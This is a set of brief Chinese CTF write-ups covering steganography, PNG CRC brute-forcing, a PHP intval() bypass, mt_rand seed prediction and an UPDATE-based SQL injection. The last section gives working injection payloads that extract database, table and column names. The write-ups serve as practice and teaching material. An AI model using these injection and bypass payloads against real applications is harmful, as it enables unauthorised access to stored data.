[SWPUCTF 2022 新生赛]Capture!
Problem: [SWPUCTF 2022 新生赛]Capture!
[[toc]]
修改高度得part1
再LSB隐写一把梭
zsteg -a flag.png #一把梭
猜测base64,无果
再颠倒顺序即可解出
[SWPUCTF 2022 新生赛]Cycle Again
Problem: [SWPUCTF 2022 新生赛]Cycle Again
先用010查看图片发现图片的宽和高为零即可知是crc爆破
再用脚本crc爆破
import binascii
import struct
# \x49\x48\x44\x52\x00\x00\x01\x00\x00\x00\x00\x00\x08\x02\x00\x00\x00
crc32key = 0x6bb7ad9c
for i in range(0, 65535):
for j in range(0, 5000):
width = struct.pack('>i', j)
height = struct.pack('>i', i)
data = b'\x49\x48\x44\x52' + width + height + b'\x08\x06\x00\x00\x00'
crc32result = binascii.crc32(data) & 0xffffffff
if crc32result == crc32key:
print(''.join(map(lambda c: "%02X" % c, width)))
print(''.join(map(lambda c: "%02X" % c, height)))
output:
00000800
00000480
即可得到part1
再用crc爆破压缩包即可获得part2
[SWPUCTF 2022 新生赛]Coffee Please
解压文档
使用vscode 搜索
即可得到flag
NSSCTF{8ff8a53a-9378-4e78-b54a-ef86e8c84432}
Problem: [SWPUCTF 2022 新生赛]Convert Something
[SWPUCTF 2022 新生赛]Convert Something
零宽隐写+base64隐写
零宽隐写
网站
base64隐写脚本
import base64
def get_base64_diff_value(s1, s2):
base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
res = 0
for i in range(len(s1)):
if s1[i] != s2[i]:
return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
return res
def solve_stego():
with open('.\字频统计.txt', 'rb') as f:
file_lines = f.readlines()
bin_str=''
for line in file_lines:
steg_line = line.decode().replace('\r\n', '')
norm_line = base64.b64encode((base64.b64decode(line))).decode()
diff = get_base64_diff_value(steg_line, norm_line)
pads_num = steg_line.count('=')
if diff:
bin_str += bin(diff)[2:].zfill(pads_num * 2)
else:
bin_str += '0' * pads_num * 2
print (bin_str)
res_str = ''
for i in range(0, len(bin_str), 8):
res_str += chr(int(bin_str[i:i+8], 2))
print (res_str)
if __name__=='__main__':
solve_stego()
[SWPUCTF 2022 新生赛]Does your nc work?
nc 连接签到题,注意不要用windows连接就行
[SWPUCTF 2022 新生赛]funny_web
Problem: [SWPUCTF 2022 新生赛]funny_web
账号NSS
密码2122693401
intval()函数用于字符串转整数,可以使十六进制转十进制用于绕过数字过滤
intval()函数绕过,可以凭借字符串拼接绕过
payload:?num=12345a
[GWCTF 2019]枯燥的抽奖
PHP随机数预测
使用php_mt_seed
首先查看源码发现/check,可以发现生成逻辑,简单分析后就可以知道生成的前几位是什么,再生成php_mt_seed能识别的格式match_min matchmax 0 range_max,再用在线网站的生成即可
str1="TWKZDu268g"
key="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
finall=""
for i in str1:
num = key.index(i)
finall+=(str(num)+" ")*2+'0'+" "+str(len(key)-1)+" "
print(finall)
再在在线网站运行就行,版本要求PHP 7.1.0+
[HUBUCTF 2022 新生赛]ezsql
考察update注入,首先可以注册一个账号,进入改资料的界面,抓包可以发现这里是进行了一个update操作
可以猜测到后台是用的update,其次可以扫描目录
可以发现源码泄露
注入语句
update users set age=$_POST[age],nickname='$_POST[nickname]',description='$_POST[description]' where id=$_SESSION[id];
注入database
nickname=%27+or+%3D1%3D11#&age=111,description=(select+database())#&description=(select+group_concat(password)users)%23&token=6344aa21324c599047073b593793ee61
database会在description显示
tables
nickname=%27+or+%3D1%3D11#&age=111,description=(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())#&description=(select+group_concat(password)users)%23&token=6344aa21324c599047073b593793ee61
columns
nickname=%27+or+%3D1%3D11#&age=111,description=(select+group_concat(column_name)+from+information_schema.columns+where+table_schema=database()+and+table_name=0x7573657273)#&description=(select+group_concat(password)users)%23&token=6344aa21324c599047073b593793ee61
users要改成十六进制的0x7573657273
